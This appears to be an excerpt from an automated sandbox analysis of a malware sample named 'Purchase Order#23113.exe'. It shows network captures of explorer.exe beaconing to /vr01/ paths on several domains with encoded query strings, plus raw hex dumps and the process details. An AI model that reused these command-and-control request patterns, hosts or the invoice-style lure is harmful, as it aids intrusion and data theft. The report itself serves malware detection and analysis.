                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68
                                                                          Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta h
                                                                          Apr 8, 2024 10:04:25.700649977 CEST1286INData Raw: 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58
                                                                          Data Ascii: ttp-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><li
                                                                          Apr 8, 2024 10:04:25.700716972 CEST1286INData Raw: 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20
                                                                          Data Ascii: <div class="cf-section cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </d
                                                                          Apr 8, 2024 10:04:25.700769901 CEST1286INData Raw: 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 66 6f 6f 74 65 72 20 63 66 2d 77 72 61 70 70 65 72 20 77 2d 32 34 30 20 6c 67 3a 77 2d 66 75 6c 6c 20 70 79 2d 31 30 20 73 6d 3a 70 79 2d 34 20 73 6d 3a 70 78
                                                                          Data Ascii: <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Clou
                                                                          Apr 8, 2024 10:04:25.700799942 CEST258INData Raw: 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 26 26 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 64 29 7d 29 28 29 3b 3c 2f 73 63 72 69 70 74 3e 0a
                                                                          Data Ascii: document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script></div>... /.error-footer --> </div>... /#cf-error-details --> </div>... /#cf-wrapper --> <script> window._cf_translation = {}; </script><


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.449746198.185.159.144802580C:\Windows\explorer.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Apr 8, 2024 10:04:46.028484106 CEST166OUTGET /vr01/?Vr=L4nHMf5x&YN9P-lUP=fg5rWdIOm16VAcpULIi6VqF28GIEm83UbJ9UUTJ5CcfameYBqVWF6xiHMvk1uSJgUfvX HTTP/1.1
                                                                          Host: www.mks-digital.net
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Apr 8, 2024 10:04:46.191276073 CEST1276INHTTP/1.1 400 Bad Request
                                                                          Cache-Control: no-cache, must-revalidate
                                                                          Content-Length: 77564
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Date: Mon, 08 Apr 2024 08:04:46 UTC
                                                                          Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                          Pragma: no-cache
                                                                          Server: Squarespace
                                                                          X-Contextid: sVuDzrvl/wWLYSpjb
                                                                          Connection: close
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                                                          Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;
                                                                          Apr 8, 2024 10:04:46.191355944 CEST1276INData Raw: 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20
                                                                          Data Ascii: font-weight: 300; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 300; color: #191919; } @media (max-width: 600px) { body { font-size: 10px; } } @font-face { font-family
                                                                          Apr 8, 2024 10:04:46.191409111 CEST1276INData Raw: 5a 63 36 54 67 4b 77 31 43 5a 4c 45 58 79 47 5a 76 49 55 6a 4a 54 46 4c 57 58 69 45 6a 6b 6a 50 2f 45 62 4e 73 72 37 4a 58 55 39 6b 62 54 57 76 76 4e 49 74 64 68 59 66 30 56 70 6a 56 43 35 78 36 41 57 48 30 43 6f 70 4a 39 6b 4c 4c 32 46 4d 6f 34
                                                                          Data Ascii: Zc6TgKw1CZLEXyGZvIUjJTFLWXiEjkjP/EbNsr7JXU9kbTWvvNItdhYf0VpjVC5x6AWH0CopJ9kLL2FMo41uoZFFIwX0vyHuEjHYH2VmrxOkqFo0adgxDecFou4ep9oyEd/DYGc3ZB+z+7LZeRzLqapLukxRFwknNZLe1mD3UUryptN0i8agj3nXEkMT3jM6TFgFmSPui9ANP5tgumW+7GL2HT49v6T21zEFSmU/PyRmlIHkbMt
                                                                          Apr 8, 2024 10:04:46.191421986 CEST268INData Raw: 41 62 54 6a 45 6d 75 66 55 51 6f 51 67 41 37 52 69 72 39 61 39 68 5a 78 71 47 69 48 63 52 46 7a 33 71 43 59 53 35 6f 69 36 56 6e 58 56 63 2b 31 6a 6f 48 35 33 57 4c 6c 77 6a 39 5a 58 78 72 33 37 75 63 66 65 38 35 4b 59 62 53 5a 45 6e 4e 50 71 75
                                                                          Data Ascii: AbTjEmufUQoQgA7Rir9a9hZxqGiHcRFz3qCYS5oi6VnXVc+1joH53WLlwj9ZXxr37ucfe85KYbSZEnNPquYQLdZGuGjum67O6vs4pznNN15fYXFdOLuLWXrsKEmCQSfZo21npOsch0vJ4uwm8gxs1rVFd7xXNcYLdHOA8u6Q+yN/ryi71Hun8adEPitdau1oRoJdRdmo7vWKu+0nK470m8D6uPnOKeCe7xMpwlB3s5Szbpd7HP+
                                                                          Apr 8, 2024 10:04:46.191508055 CEST1276INData Raw: 64 57 72 56 38 34 7a 76 71 7a 55 70 39 38 37 66 66 4f 71 71 2b 70 6a 34 6c 4d 59 63 71 2b 5a 58 75 5a 73 78 54 49 4d 35 5a 7a 6e 4f 75 49 56 7a 61 6e 45 38 43 58 6a 4f 52 4a 38 38 35 36 67 57 65 63 49 73 37 33 47 34 49 56 61 54 6f 6d 2b 46 64 5a
                                                                          Data Ascii: dWrV84zvqzUp987ffOqq+pj4lMYcq+ZXuZsxTIM5ZznOuIVzanE8CXjORJ8856gWecIs73G4IVaTom+FdZmk13iQhZpVvwWaeJJvZwmZfgLrMEPDsmWSeTP2pgBIVqr44ljnDOc42NDfmKJscRnzjslLu8YD7DeUiQta8q+gTM8UuJgxqs1ltlxGmF3mHRe8w7M6YKbpYWBIZw6abAXoINXCHv8WIYdhau8bWC2V991qxUKLIeS
                                                                          Apr 8, 2024 10:04:46.191533089 CEST1276INData Raw: 73 55 74 73 78 4c 45 35 68 38 53 70 70 4e 4d 66 78 35 69 6a 57 48 70 62 33 6d 5a 31 45 36 68 46 5a 43 4f 74 4a 6d 38 39 4a 38 42 6e 78 37 48 39 43 4d 66 7a 59 41 58 4d 37 66 6d 78 47 73 68 77 4c 6a 56 68 6f 78 30 49 4c 46 71 72 77 35 2b 64 6f 7a
                                                                          Data Ascii: sUtsxLE5h8SppNMfx5ijWHpb3mZ1E6hFZCOtJm89J8Bnx7H9CMfzYAXM7fmxGshwLjVhox0ILFqrw5+doz1Kt5lGsvahyjMuRVHINKIASaMX6Aaz/zP39dVJaibMTznE8XEmMq8H7zHPYm8ZeF/aKMDTB0O12KY6trbCV4ekxPC26HLAH2M1LTSQ0hyP1ROTBMgNLCwxVMHS4fHg2e2RNqvGnJI340EzbSTZWms3Y345WE1qeFI
                                                                          Apr 8, 2024 10:04:46.191646099 CEST1276INData Raw: 6a 66 69 63 35 33 53 6e 75 34 72 53 74 2b 48 74 59 6a 2b 4a 76 41 47 4a 49 64 55 67 7a 75 6b 70 63 44 65 4a 72 47 31 62 6d 34 57 73 62 6c 75 59 78 4f 77 31 62 47 7a 77 4c 30 44 74 4c 41 71 42 6c 41 74 30 35 36 4c 61 6a 65 7a 71 36 48 72 5a 50 77
                                                                          Data Ascii: jfic53Snu4rSt+HtYj+JvAGJIdUgzukpcDeJrG1bm4WsbluYxOw1bGzwL0DtLAqBlAt056Lajezq6HrZPw/M09kfgGcfzBOwryRaVDs6DJQcm6Z8PXsbsd4goAUYk4XLU6HLUiC2fVyfFCeYUc9OUuGlK7uaNENPDxPKgKHrPYD2KRgA0Jz1pdYiVah3ihI8SsbuZ7Qut7FtdT28OepdJALQ9kcuIqJaIlksKpGWQaBJEs5Ro2u
                                                                          Apr 8, 2024 10:04:46.191683054 CEST1276INData Raw: 49 73 56 6e 48 51 76 47 66 48 4a 59 2b 47 73 46 4f 76 65 49 61 4c 6b 5a 54 6f 6d 2b 43 35 70 6e 6e 30 5a 74 5a 4f 73 63 53 62 64 54 51 5a 49 5a 49 6a 7a 4e 47 71 33 6a 5a 65 59 56 58 71 62 44 42 4b 37 7a 4f 50 76 37 4e 6d 78 7a 6d 4d 43 6f 36 79
                                                                          Data Ascii: IsVnHQvGfHJY+GsFOveIaLkZTom+C5pnn0ZtZOscSbdTQZIZIjzNGq3jZeYVXqbDBK7zOPv7NmxzmMCo6yxGOpqJLxQEPP8ebkh2xjxPso8Vpyed4bWtGDod5nbfYx2tE9IjIcwqDOQxCLgjqhrjJapxQj5aykZ/KjJyp8vYw2jOkioWHg6QaitbobouivfRYdGlwB0//RiIvIqLJ/al9rsfi5oavS3VijivkmceYKJ2jlOzsy3
                                                                          Apr 8, 2024 10:04:46.191745043 CEST1276INData Raw: 62 61 4b 64 68 59 6b 30 71 76 4f 51 56 49 71 79 6b 70 38 72 73 6c 57 4b 4b 62 77 45 6d 55 72 39 49 52 64 38 6c 67 73 49 66 2b 75 77 66 68 39 72 73 6a 2f 2f 30 34 7a 38 50 49 39 68 69 6d 33 61 35 51 30 68 41 67 43 76 57 73 45 6c 37 48 4c 47 6b 53
                                                                          Data Ascii: baKdhYk0qvOQVIqykp8rslWKKbwEmUr9IRd8lgsIf+uwfh9rsj//04z8PI9him3a5Q0hAgCvWsEl7HLGkSm8xy74a7RIq2RyhLLq4vENxWg6Z8OdDn9k/pO8nvZ82B9HQH4suep5bgnoW/t4r+OSsr3KDZZ7hjnjRmpSwWGJ1Rz24Sgbupfrusw+nYg9brZp6vKv2bXV9yNo3FwRf1UmbhULadGRmefHVN7jCO1g05Yzd4bBIOY
                                                                          Apr 8, 2024 10:04:46.191806078 CEST1276INData Raw: 50 33 55 43 44 61 59 67 2f 34 41 2f 4a 38 2b 65 6d 71 41 74 30 47 53 57 39 51 6d 2b 6b 37 6b 35 75 59 62 72 75 30 61 4e 30 4a 59 59 52 78 4a 2b 54 49 52 2b 6e 4c 46 4d 64 4f 39 39 63 4f 75 69 69 68 38 46 49 79 73 53 4d 78 4b 7a 59 77 45 59 32 73
                                                                          Data Ascii: P3UCDaYg/4A/J8+emqAt0GSW9Qm+k7k5uYbru0aN0JYYRxJ+TIR+nLFMdO99cOuiih8FIysSMxKzYwEY2sYWtbOMEdrKbPexlHwd4Hi/ghbyIF/MSXuoOf52DHIoeT/J0/wJ3SqRpQnpexxt4N+/hvbyP9ztH3+MHTs4d3Mnd3MuDPMpjQmmVVVe7pmpu5KHLiejRfHs+PruYnKemd+nbnlzBbpT+/sSSBYiT///ekfH78UPEBW
                                                                          Apr 8, 2024 10:04:46.350611925 CEST1276INData Raw: 39 79 46 49 39 70 49 64 59 71 59 66 31 4d 41 4e 36 52 49 2b 77 53 49 2f 71 55 5a 5a 48 77 6a 6f 6a 59 54 73 6a 59 66 6d 34 36 56 4d 69 5a 79 64 45 7a 72 5a 48 7a 71 5a 46 7a 72 5a 46 7a 6e 5a 45 7a 72 4b 52 73 33 7a 6b 72 44 74 79 6c 6f 75 63 37
                                                                          Data Ascii: 9yFI9pIdYqYf1MAN6RI+wSI/qUZZHwjojYTsjYfm46VMiZydEzrZHzqZFzrZFznZEzrKRs3zkrDtylouc7Y6c5SNn2chZLr75MySMUDeDNMxk2kyDdtPEJJOKxLSMvRjTTD7cnRbuTgp3m8OV6eHKjHBlZrgyK1yZHa7MCVfmhivzwpWOcKUzXOkKV7rDlZ5wpTdc6QtX+sOVgfBjOPwohx9Tw4/28CMXfmTCj9bwoxZ+JOFHMf


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          4192.168.2.44974766.235.200.146802580C:\Windows\explorer.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Apr 8, 2024 10:05:27.536501884 CEST166OUTGET /vr01/?Vr=L4nHMf5x&YN9P-lUP=GUL62cbCCJOJReCemxk1O8Otc3kXCElGSolYG/8Ig6Cn2Nx69M0sY0/cN1gdp8glXS6z HTTP/1.1
                                                                          Host: www.snugandkind.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Apr 8, 2024 10:05:27.916409016 CEST752INHTTP/1.1 301 Moved Permanently
                                                                          Date: Mon, 08 Apr 2024 08:05:27 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                          X-Redirect-By: WordPress
                                                                          Location: http://snugandkind.com/vr01/?Vr=L4nHMf5x&YN9P-lUP=GUL62cbCCJOJReCemxk1O8Otc3kXCElGSolYG/8Ig6Cn2Nx69M0sY0/cN1gdp8glXS6z
                                                                          host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                          X-Endurance-Cache-Level: 2
                                                                          X-nginx-cache: WordPress
                                                                          X-Newfold-Cache-Level: 2
                                                                          CF-Cache-Status: MISS
                                                                          Set-Cookie: _cfuvid=gfplOYp72HVZ35_JJ9NfjiYQMmKwgr0NbUaUZ.E.6PA-1712563527851-0.0.1.1-604800000; path=/; domain=.www.snugandkind.com; HttpOnly
                                                                          Server: cloudflare
                                                                          CF-RAY: 8710c09f78cb7428-MIA
                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          5192.168.2.44974813.248.169.48802580C:\Windows\explorer.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Apr 8, 2024 10:05:47.854455948 CEST165OUTGET /vr01/?YN9P-lUP=om+RAj9K10xplgkf4U8b3M9JRGUJ2euP6f07OPQVfzk2A/ET/uqRAGThuSpikjnaupQL&Vr=L4nHMf5x HTTP/1.1
                                                                          Host: www.owletbaby.shop
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Apr 8, 2024 10:05:48.007040024 CEST344INHTTP/1.1 200 OK
                                                                          Server: openresty
                                                                          Date: Mon, 08 Apr 2024 08:05:47 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 204
                                                                          Connection: close
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 59 4e 39 50 2d 6c 55 50 3d 6f 6d 2b 52 41 6a 39 4b 31 30 78 70 6c 67 6b 66 34 55 38 62 33 4d 39 4a 52 47 55 4a 32 65 75 50 36 66 30 37 4f 50 51 56 66 7a 6b 32 41 2f 45 54 2f 75 71 52 41 47 54 68 75 53 70 69 6b 6a 6e 61 75 70 51 4c 26 56 72 3d 4c 34 6e 48 4d 66 35 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?YN9P-lUP=om+RAj9K10xplgkf4U8b3M9JRGUJ2euP6f07OPQVfzk2A/ET/uqRAGThuSpikjnaupQL&Vr=L4nHMf5x"}</script></head></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          6192.168.2.44974945.76.63.192802580C:\Windows\explorer.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Apr 8, 2024 10:06:29.007960081 CEST171OUTGET /vr01/?YN9P-lUP=9c9cKs9OosrhOa63FDxOZSQTlUYWLUzvl6rD164QiuJtlecCGMWXkWvi90D7WwOzyhmU&Vr=L4nHMf5x HTTP/1.1
                                                                          Host: www.studioenginedemo.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Apr 8, 2024 10:06:29.144575119 CEST453INHTTP/1.1 301 Moved Permanently
                                                                          Server: nginx
                                                                          Date: Mon, 08 Apr 2024 08:06:29 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 162
                                                                          Connection: close
                                                                          Location: https://www.studioenginedemo.com/vr01/?YN9P-lUP=9c9cKs9OosrhOa63FDxOZSQTlUYWLUzvl6rD164QiuJtlecCGMWXkWvi90D7WwOzyhmU&Vr=L4nHMf5x
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          7192.168.2.44975066.147.240.91802580C:\Windows\explorer.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Apr 8, 2024 10:06:49.944631100 CEST164OUTGET /vr01/?Vr=L4nHMf5x&YN9P-lUP=wFZ5enEBtK4n2aaiRnhfStMJiblJh5bHmGRWjDpakqkf/10aPf5zMfbio25A5myUwmpi HTTP/1.1
                                                                          Host: www.oregonjobs.co
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Apr 8, 2024 10:06:50.147938967 CEST479INHTTP/1.1 404 Not Found
                                                                          Date: Mon, 08 Apr 2024 08:06:50 GMT
                                                                          Server: Apache
                                                                          Content-Length: 315
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Target ID:0
                                                                          Start time:10:02:45
                                                                          Start date:08/04/2024
                                                                          Path:C:\Users\user\Desktop\Purchase Order#23113.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\Purchase Order#23113.exe"
                                                                          Imagebase:0xc60000
                                                                          File size:651'272 bytes
                                                                          MD5 hash:FA3E92F061246F3B1625E6F8B8291836
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
